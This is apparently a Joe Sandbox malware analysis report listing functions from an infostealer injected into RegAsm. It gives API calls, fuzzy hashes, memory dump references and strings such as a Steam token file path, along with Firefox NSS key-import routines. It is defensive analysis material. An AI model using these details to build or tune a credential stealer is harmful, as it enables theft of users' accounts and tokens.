Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B

Function 00416FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(?), ref: 00416FFE

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Soft\Steam\steam_tokens.txt, xrefs: 0041700E

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 502913869-3507145866
Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5

Function 004077F8 Relevance: 2.6, APIs: 2, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715

Function 0041CBB8 Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CBC9

Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1

malloc.MSVCRT ref: 0041CC06

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc$lstrcpylstrlen
String ID:
API String ID: 2974738957-0
Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8

Function 004184AE Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D

Function 00407BD2 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A

Function 00411DBC Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94

Function 00411D92 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8

Function 00412541 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32(?), ref: 00412577

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9

Function 00407EAE Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00407EB5

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55

Non-executed Functions

Function 6CA97C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA97C33
NSS_OptionGet.NSS3(0000000C,00000000), ref: 6CA97C66
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA97D1E

Part of subcall function 6CA97870: SECOID_FindOID_Util.NSS3(?,?,?,6CA991C5), ref: 6CA9788F

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA97D48
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CA97D71
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA97DD3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA97DE1
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA97DF8
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA97E1A
PR_SetError.NSS3(FFFFE067,00000000), ref: 6CA97E58

Part of subcall function 6CA97870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA991C5), ref: 6CA978BB
Part of subcall function 6CA97870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6CA991C5), ref: 6CA978FA
Part of subcall function 6CA97870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6CA991C5), ref: 6CA97930
Part of subcall function 6CA97870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CA991C5), ref: 6CA97951
Part of subcall function 6CA97870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA97964
Part of subcall function 6CA97870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CA9797A
Part of subcall function 6CA97870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CA97988
Part of subcall function 6CA97870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6CA97998
Part of subcall function 6CA97870: free.MOZGLUE(00000000), ref: 6CA979A7
Part of subcall function 6CA97870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6CA991C5), ref: 6CA979BB
Part of subcall function 6CA97870: PR_GetCurrentThread.NSS3(?,?,?,?,6CA991C5), ref: 6CA979CA

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA97E49
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA97F8C
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CA97F98
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA97FBF
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA97FD9
PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6CA98038
SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CA98050
PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CA98093
SECOID_FindOID_Util.NSS3 ref: 6CA97F29

Part of subcall function 6CA907B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA38298,?,?,?,6CA2FCE5,?), ref: 6CA907BF
Part of subcall function 6CA907B0: PL_HashTableLookup.NSS3(?,?), ref: 6CA907E6
Part of subcall function 6CA907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA9081B
Part of subcall function 6CA907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA90825

SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6CA98072
SECOID_FindOID_Util.NSS3 ref: 6CA980F5

Part of subcall function 6CA9BC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CA9800A,00000000,?,00000000,?), ref: 6CA9BC3F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
String ID:
API String ID: 2815116071-0
Opcode ID: 64f1a3bd897750f37d295c742d7601558193bb1d4fb42b27bec1214e11006f21
Instruction ID: d49ba6ff34e0c5bcd6dafe5b88bb585e92a078d7fbe8ac74cdfb00b5c7379505
Opcode Fuzzy Hash: 64f1a3bd897750f37d295c742d7601558193bb1d4fb42b27bec1214e11006f21
Instruction Fuzzy Hash: AEE1A1716153019FD700CF28D982B5B77E5AF84718F18492DE88ADBB61E731EC89CB62

Function 00415B0B Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 179stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
HeapAlloc.KERNEL32(00000000), ref: 00415B37
wsprintfA.USER32 ref: 00415B50
FindFirstFileA.KERNEL32(?,?), ref: 00415B67
StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
wsprintfA.USER32 ref: 00415BC9

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 0041580D: _memset.LIBCMT ref: 00415845
Part of subcall function 0041580D: _memset.LIBCMT ref: 00415856
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00415881
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 0041589F
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 004158B3
Part of subcall function 0041580D: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 004158C6
Part of subcall function 0041580D: StrStrA.SHLWAPI(00000000), ref: 0041596A

FindNextFileA.KERNEL32(?,?), ref: 00415CD8
FindClose.KERNEL32(?), ref: 00415CEC
lstrcatA.KERNEL32(?), ref: 00415D1A
lstrcatA.KERNEL32(?), ref: 00415D2D
lstrlenA.KERNEL32(?), ref: 00415D39
lstrlenA.KERNEL32(?), ref: 00415D56

Strings

K_A, xrefs: 00415DE8
%s\*, xrefs: 00415B4A
%s\%s, xrefs: 00415BC3

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$Findlstrlen$FileHeap_memsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*$K_A
API String ID: 2347508687-1624741228
Opcode ID: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
Instruction ID: f1f80ab8573884d5547ab2b117a2a7bfd804ed3709ed9bfee1ddc7f274e11282
Opcode Fuzzy Hash: 2d45aad56b69257e22c84493828d34e31e8b8a1878497380ca564db6f63f63f9
